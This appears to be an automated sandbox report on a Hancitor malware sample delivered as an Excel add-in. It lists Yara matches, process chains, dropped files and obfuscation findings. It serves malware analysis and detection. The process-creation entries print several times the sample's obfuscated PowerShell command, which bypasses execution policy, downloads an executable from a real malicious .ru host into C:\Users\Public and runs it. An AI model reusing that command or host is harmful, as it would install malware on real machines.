Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Malicious sample detected (through community Yara rule)

Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly
Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly
Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\snd32sys.exe

Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\snd32sys.exe

Process Stats: CPU usage > 98%

Detected potential crypto function

Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04B2E670	2_2_04B2E670
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00643154	16_2_00643154
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0063A1B7	16_2_0063A1B7
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0063C250	16_2_0063C250
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0064920D	16_2_0064920D
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00643386	16_2_00643386
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062D39F	16_2_0062D39F
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00629420	16_2_00629420
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_006435C7	16_2_006435C7
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0065F68B	16_2_0065F68B
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00639707	16_2_00639707
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062D711	16_2_0062D711
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0063C7C0	16_2_0063C7C0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0065F7AB	16_2_0065F7AB
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0064382C	16_2_0064382C
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0065B830	16_2_0065B830
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062D9BB	16_2_0062D9BB
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00643AA0	16_2_00643AA0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062CB20	16_2_0062CB20
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0063CBF0	16_2_0063CBF0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00652C03	16_2_00652C03
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00642CE1	16_2_00642CE1
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062DC82	16_2_0062DC82
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00643D05	16_2_00643D05
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062DF3D	16_2_0062DF3D
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00642F13	16_2_00642F13

Found potential string decryption / allocating functions

Source: C:\Users\Public\snd32sys.exe	Code function: String function: 0062B2C4 appears 61 times
Source: C:\Users\Public\snd32sys.exe	Code function: String function: 0062BBA0 appears 50 times
Source: C:\Users\Public\snd32sys.exe	Code function: String function: 0062B2F8 appears 46 times

PE / OLE file has an invalid certificate

Source: 0708_5355150121.xll

Static PE information: invalid certificate

PE file contains strange resources

Source: snd32sys.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: snd32sys.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Searches for the Microsoft Outlook file path

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Uses 32bit PE files

Source: 0708_5355150121.xll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Yara signature match

Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000003.262530252.0000000007E07000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.224221003.0000000002F76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.225049085.0000000002F76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLL@10/11@4/4

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{0A2181D0-DD23-4259-8109-9971A9896497} - OProcSessId.dat

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 0708_5355150121.xll	Virustotal: Detection: 23%
Source: 0708_5355150121.xll	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source:

Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\snd32sys.exe

Unpacked PE file: 16.2.snd32sys.exe.610000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,

16_2_00613560

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .img

PE file contains sections with non-standard names

Source: 0708_5355150121.xll	Static PE information: section name: .img
Source: 0708_5355150121.xll	Static PE information: section name: .ico
Source: 0708_5355150121.xll	Static PE information: section name: .fyjrtr
Source: 0708_5355150121.xll	Static PE information: section name: .rytkrer
Source: 0708_5355150121.xll	Static PE information: section name: .reyery
Source: 0708_5355150121.xll	Static PE information: section name: .txt
Source: 0708_5355150121.xll	Static PE information: section name: .res

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04B212A1 push es; ret	2_2_04B212B0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062B28D push ecx; ret	16_2_0062B2A0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062034A push 8BFFFFFFh; ret	16_2_0062034F
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_006208AD push 8BFFFFFFh; ret	16_2_006208B2
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062BBE6 push ecx; ret	16_2_0062BBF9

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\snd32sys.exe

Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\snd32sys.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\snd32sys.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\Public\snd32sys.exe

16_2_00629420

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
